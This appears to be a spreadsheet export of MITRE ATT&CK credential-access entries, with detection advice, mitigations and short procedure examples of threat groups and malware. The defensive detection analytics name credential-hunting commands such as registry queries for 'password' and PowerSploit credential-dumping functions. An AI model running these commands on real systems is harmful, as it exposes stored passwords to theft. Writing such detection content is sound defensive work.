Periodically review for new and unknown network provider DLLs within the Registry (`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider\ProviderPath`). Ensure only valid network provider DLLs are registered. The name of these can be found in the Registry key at `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`, and have corresponding service subkey pointing to a DLL at `HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider`.
Multi-factor Authentication
Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. 
Operating System Configuration
Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (`C:\Windows\System32\` by default) of a domain controller and/or local computer with a corresponding entry in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages`. 
Starting in Windows 11 22H2, the `EnableMPRNotifications` policy can be disabled through Group Policy or through a configuration service provider to prevent Winlogon from sending credentials to network providers.(Citation: EnableMPRNotifications)
Password Policies
Ensure that &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property is set to disabled unless there are application requirements.(Citation: store_pwd_rev_enc)
Privileged Account Management
Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)
Limit access to the root account and prevent users from modifying protected components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.
Limit on-premises accounts with access to the hybrid identity solution in place. For example, limit Azure AD Global Administrator accounts to only those required, and ensure that these are dedicated cloud-only accounts rather than hybrid ones.(Citation: MagicWeb)
Privileged Process Integrity
Enabled features, such as Protected Process Light (PPL), for LSA.(Citation: Microsoft LSA)
Restrict File and Directory Permissions
Restrict write access to the `/Library/Security/SecurityAgentPlugins` directory.
Restrict Registry Permissions
Restrict Registry permissions to disallow the modification of sensitive Registry keys such as `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`.
User Account Management
Ensure that proper policies are implemented to dictate the the secure enrollment and deactivation of authentication mechanisms, such as MFA, for user accounts.
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications.(Citation: Mandiant FIN13 Aug 2022)  
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized &lt;code&gt;ssh-add&lt;/code&gt; function.(Citation: ESET Ebury Feb 2014)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has trojanized the &lt;sode&gt;ssh_login&lt;/code&gt; and &lt;code&gt;user-auth_pubkey&lt;/code&gt; functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Enable security auditing to collect logs from hybrid identity solutions. For example, monitor sign-ins to the Azure AD Application Proxy Connector, which are typically generated only when a new PTA Agent is added. (Citation: Mandiant Azure AD Backdoors) If AD FS is in use, review the logs for event ID 501, which specifies all EKU attributes on a claim, and raise alerts on any values that are not configured in your environment.(Citation: MagicWeb)
File Modification
Monitor for suspicious modification of files associated with hybrid identity authentication processes, such as configuration files. Monitor for access to certificates and cryptographic keys material.
Logon Session Creation
Monitor for discrepancies in authentication to cloud services, such as PTA sign-ins recorded in Azure AD that lack corresponding events in AD.(Citation: Azure AD PTA Vulnerabilities)
Module Load
Monitor the hybrid identity solution in use for the loading of unauthorized DLLs. For example, monitor all PTA agent servers for the creation of DLLs as well as the loading of DLLs into the `AzureADConnectAuthenticationAgentService` process.(Citation: Mandiant Azure AD Backdoors) If AD FS is in use, monitor the AD FS server for the creation of DLLs as well as the loading of unrecognized or unsigned DLLs into the `Microsoft.IdentityServer.Servicehost` application.(Citation: MagicWeb)
Audit
Periodically review the hybrid identity solution in use for any discrepancies. For example, review all PTA agents in the Azure Management Portal to identify any unwanted or unapproved ones.(Citation: Mandiant Azure AD Backdoors) If ADFS is in use, review DLLs and executable files in the AD FS and Global Assembly Cache directories to ensure that they are signed by Microsoft. Note that in some cases binaries may be catalog-signed, which may cause the file to appear unsigned when viewing file properties.(Citation: MagicWeb)
Multi-factor Authentication
Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. 
Privileged Account Management
Limit on-premises accounts with access to the hybrid identity solution in place. For example, limit Azure AD Global Administrator accounts to only those required, and ensure that these are dedicated cloud-only accounts rather than hybrid ones.(Citation: MagicWeb)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.(Citation: MagicWeb)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can inject a malicious DLL (`PTASpy`) into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.(Citation: AADInternals Azure AD On-Prem to Cloud)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor for changes to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Logon Session Creation
Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy)
OS API Execution
Monitor for API calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller
Process Access
Monitor for unexpected processes interacting with the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
Multi-factor Authentication
Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. 
Privileged Account Management
Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)
Privileged Process Integrity
Enabled features, such as Protected Process Light (PPL), for LSA.(Citation: Microsoft LSA)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114)'s malware has altered the NTLM authentication program on domain controllers to allow [Chimera](https://attack.mitre.org/groups/G0114) to login without a valid credential.(Citation: Cycraft Chimera April 2020)	
Skeleton Key
[Skeleton Key](https://attack.mitre.org/software/S0007) is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.(Citation: Dell Skeleton)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that aid in sniffing network traffic to capture information about an environment, including authentication material passed over the network
Process Creation
Monitor for newly executed processes that can aid in sniffing network traffic to capture information about an environment, including authentication material passed over the network 
Note: The Analytic is for Windows systems and looks for new processes that have the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy.
&lt;h4&gt;Analytic 1 - Windows&lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
(event_id == "1" OR event_id == "4688") AND
exe == "tshark.exe" OR
exe == "windump.exe" OR
(exe == "logman.exe" AND parent_exe exists AND parent_exe!="C:\Program Files\Windows Event Reporting\Core\EventReporting.AgentService.exe") OR
exe == "tcpdump.exe" OR
exe == "wprui.exe" OR
exe == "wpr.exe" ) &lt;/code&gt;
Encrypt Sensitive Information
Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.
Multi-factor Authentication
Use multi-factor authentication wherever possible.
Network Segmentation
Deny direct access of broadcasts and multicast sniffing, and prevent attacks such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001)
User Account Management
In cloud environments, ensure that users are not granted permissions to create or modify traffic mirrors unless this is explicitly required.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) used [BlackEnergy](https://attack.mitre.org/software/S0089)’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems. (Citation: Charles McLellan March 2016)
APT28
[APT28](https://attack.mitre.org/groups/G0007) deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017) [APT28](https://attack.mitre.org/groups/G0007) close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.(Citation: US District Court Indictment GRU Oct 2018)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used SniffPass to collect credentials by sniffing network traffic.(Citation: Symantec Elfin Mar 2019)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used network sniffing to obtain login data. (Citation: Securelist DarkVishnya Dec 2018)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used intercepter-NG to sniff passwords in network traffic.(Citation: ESET Telebots Dec 2016)	
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed to hook network APIs to monitor network traffic. (Citation: Trend Micro Banking Malware Jan 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) can be used to conduct packet captures on target hosts.(Citation: Github PowerShell Empire)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.(Citation: MSTIC FoggyWeb September 2021)
Impacket
[Impacket](https://attack.mitre.org/software/S0357) can be used to sniff network traffic via an interface or raw socket.(Citation: Impacket Tools)
MESSAGETAP
[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.  (Citation: FireEye MESSAGETAP October 2019)
NBTscan
[NBTscan](https://attack.mitre.org/software/S0590) can dump and print whole packet content.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can sniff network traffic to look for packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains a module for taking packet captures on compromised hosts.(Citation: GitHub PoshC2)
Regin
[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.(Citation: Kaspersky Regin)
Responder
[Responder](https://attack.mitre.org/software/S0174) captures hashes and credentials that are sent to the system after the name services have been poisoned.(Citation: GitHub Responder)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
Command Execution
Monitor executed commands and arguments that may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.
User Account Authentication
 Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.
Account Use Policies
Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out. Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Multi-factor Authentication
Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.
Password Policies
Refer to NIST guidelines when creating password policies.(Citation: NIST 800-63-3)
User Account Management
Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a script to attempt RPC authentication against a number of hosts.(Citation: Dragos Crashoverride 2018)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) performed brute force attacks against administrator accounts.(Citation: ESET Lazarus Jun 2020) 
APT28
[APT28](https://attack.mitre.org/groups/G0007) can perform brute force attacks to obtain credentials.(Citation: TrendMicro Pawn Storm 2019)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Microsoft Targeting Elections September 2020)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used Ncrack to reveal credentials.(Citation: FireEye APT39 Jan 2019)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used brute-force attack to obtain login data.(Citation: Securelist DarkVishnya Dec 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has attempted to brute force credentials to gain access.(Citation: CISA AA20-296A Berserk Bear December 2020)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has brute forced RDP credentials.(Citation: ClearSky Pay2Kitten December 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used brute force attacks to compromise valid credentials.(Citation: SecureWorks August 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used brute force techniques to obtain credentials.(Citation: FireEye APT34 Webinar Dec 2017)
Turla
[Turla](https://attack.mitre.org/groups/G0010) may attempt to connect to systems within a victim's network using &lt;code&gt;net use&lt;/code&gt; commands and a predefined list or collection of passwords.(Citation: Kaspersky Turla)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to perform brute force attacks on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) 
Chaos
[Chaos](https://attack.mitre.org/software/S0220) conducts brute force attacks against SSH services to gain initial access.(Citation: Chaos Stolen Backdoor)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has attempted to brute force hosts over SSH.(Citation: Aqua Kinsing April 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has modules for brute forcing local administrator and AD user accounts.(Citation: GitHub PoshC2)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has used brute force attempts against a central management console, as well as some Active Directory accounts.(Citation: CERT-FR PYSA April 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can conduct brute force attacks to capture credentials.(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files that may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.
Module Load
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Windows Registry Key Modification
Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Operating System Configuration
Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\Windows\System32\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages.
Strider
[Strider](https://attack.mitre.org/groups/G0041) has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.(Citation: Kaspersky ProjectSauron Full Report)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) harvests plain-text credentials as a password filter registered on domain controllers.(Citation: Kaspersky ProjectSauron Full Report)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor executed commands and arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
File Access
Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. 
Process Creation
Monitor newly executed processes for local file systems and remote file shares for files containing insecurely stored credentials.
Note: Pseudocode Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for command-line instances of searching the Windows Registry for insecurely stored credentials. This can be accomplished using the query functionality of the [Reg](https://attack.mitre.org/software/S0075) system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as [PowerSploit](https://attack.mitre.org/software/S0194)  in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.
&lt;h4&gt;Analytic 1 - Credentials in Files &amp; Registry&lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  command_line == "*reg* query HKLM /f password /t REG_SZ /s*" OR
  command_line == "reg* query HKCU /f password /t REG_SZ /s" OR
  command_line == "*Get-UnattendedInstallFile*" OR
  command_line == "*Get-Webconfig*" OR
  command_line == "*Get-ApplicationHost*" OR
  command_line == "*Get-SiteListPassword*" OR
  command_line == "*Get-CachedGPPPassword*" OR
  command_line == "*Get-RegistryAutoLogon*") &lt;/code&gt;
Audit
Preemptively search for files containing passwords and take actions to reduce the exposure risk when found.
Password Policies
Establish an organizational policy that prohibits password storage in files.
Restrict File and Directory Permissions
Restrict file shares to specific directories with access only to necessary users.
User Training
Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers.
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.(Citation: Symantec Buckeye)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has obtained administrative credentials by browsing through local files on a compromised machine.(Citation: Sygnia Elephant Beetle Jan 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed files to gain valid credentials.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools that are capable of obtaining credentials from saved mail.(Citation: Netscout Stolen Pencil Dec 2018)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has run a tool that steals passwords saved in victim email.(Citation: Symantec MuddyWater Dec 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from FTP clients and Outlook.(Citation: Proofpoint TA505 Sep 2017)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured AWS credentials and Docker API credentials.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.(Citation: AADInternals Documentation)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from configuration or support files.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.(Citation: Unit42 Azorult Nov 2018)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. (Citation: US-CERT Emotet Jul 2018)(Citation: CIS Emotet Dec 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use various modules to search for files containing passwords.(Citation: Github PowerShell Empire)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has searched for SSH keys, Docker credentials, and Kubernetes service tokens.(Citation: Unit 42 Hildegard Malware)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains modules for searching for passwords in local and remote files.(Citation: GitHub PoshC2)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has extracted credentials from the password database before encrypting the files.(Citation: CERT-FR PYSA April 2020) 
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) searches for files named logins.json to parse for credentials.(Citation: Talos Smoke Loader July 2018)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019) Additionally, it searches for the ".vnc.lnk" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)
XTunnel
[XTunnel](https://attack.mitre.org/software/S0117) is capable of accessing locally stored passwords on victims.(Citation: Invincea XTunnel)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.(Citation: Kaspersky Adwind Feb 2016)
pngdowner
If an initial connectivity check fails, [pngdowner](https://attack.mitre.org/software/S0067) attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.(Citation: CrowdStrike Putter Panda)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Modification
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.
Audit
Administrators should audit all cloud and container accounts to ensure that they are necessary and that the permissions granted to them are appropriate.  Additionally, administrators should perform an audit of all OAuth applications and the permissions they have been granted to access organizational data. This should be done extensively on all applications in order to establish a baseline, followed up on with periodic audits of new or updated applications. Suspicious applications should be investigated and removed.
Restrict Web-Based Content
Administrators can block end-user consent to OAuth applications, disabling users from authorizing third-party apps through OAuth 2.0 and forcing administrative consent for all requests. They can also block end-user registration of applications by their users, to reduce risk. A Cloud Access Security Broker can also be used to ban applications.
Azure offers a couple of enterprise policy settings in the Azure Management Portal that may help:
"Users -&gt; User settings -&gt; App registrations: Users can register applications" can be set to "no" to prevent users from registering new applications. 
"Enterprise applications -&gt; User settings -&gt; Enterprise applications: Users can consent to apps accessing company data on their behalf" can be set to "no" to prevent users from consenting to allow third-party multi-tenant applications
User Account Management
Enforce role-based access control to limit accounts to the least privileges they require. A Cloud Access Security Broker (CASB) can be used to set usage policies and manage user permissions on cloud applications to prevent access to application access tokens. In Kubernetes applications, set “automountServiceAccountToken: false” in the YAML specification of pods that do not require access to service account tokens.(Citation: Kubernetes Hardening Guide)
User Training
Users need to be trained to not authorize third-party applications they don’t recognize. The user should pay particular attention to the redirect URL: if the URL is a misspelled or convoluted sequence of words related to an expected service or SaaS application, the website is likely trying to spoof a legitimate service. Users should also be cautious about the permissions they are granting to apps. For example, offline access and access to read emails should excite higher suspicions because adversaries can utilize SaaS APIs to discover credentials and other sensitive communications.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used several malicious applications to steal user OAuth access tokens including applications masquerading as "Google Defender" "Google Email Protection," and "Google Scanner" for Gmail users. They also targeted Yahoo users with applications masquerading as "Delivery Service" and "McAfee Email Protection".(Citation: Trend Micro Pawn Storm OAuth 2017)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can steal users’ access tokens via phishing emails containing malicious links.(Citation: AADInternals Documentation)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) gathers Kubernetes service account tokens using a variety of techniques.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking.
File Access
Monitor for files being accessed that may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.
Password Policies
Ensure that root accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive information.
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may search the Registry on compromised systems for insecurely stored credentials.
Process Creation
Monitor newly executed processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.
Note: Pseudocode Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for command-line instances of searching the Windows Registry for insecurely stored credentials. This can be accomplished using the query functionality of the [Reg](https://attack.mitre.org/software/S0075) system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as [PowerSploit](https://attack.mitre.org/software/S0194)  in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.
&lt;h4&gt;Analytic 1 - Credentials in Files &amp; Registry&lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  command_line == "*reg* query HKLM /f password /t REG_SZ /s*" OR
  command_line == "reg* query HKCU /f password /t REG_SZ /s" OR
  command_line == "*Get-UnattendedInstallFile*" OR
  command_line == "*Get-Webconfig*" OR
  command_line == "*Get-ApplicationHost*" OR
  command_line == "*Get-SiteListPassword*" OR
  command_line == "*Get-CachedGPPPassword*" OR
  command_line == "*Get-RegistryAutoLogon*") &lt;/code&gt;
Windows Registry Key Access
Monitor for unexpected windows registry key being accessed that may search the Registry on compromised systems for insecurely stored credentials.
Audit
Proactively search for credentials within the Registry and attempt to remediate the risk.
Password Policies
Do not store credentials within the Registry.
Privileged Account Management
If it is necessary that software must store credentials in the Registry, then ensure the associated accounts have limited permissions so they cannot be abused if obtained by an adversary.
APT32
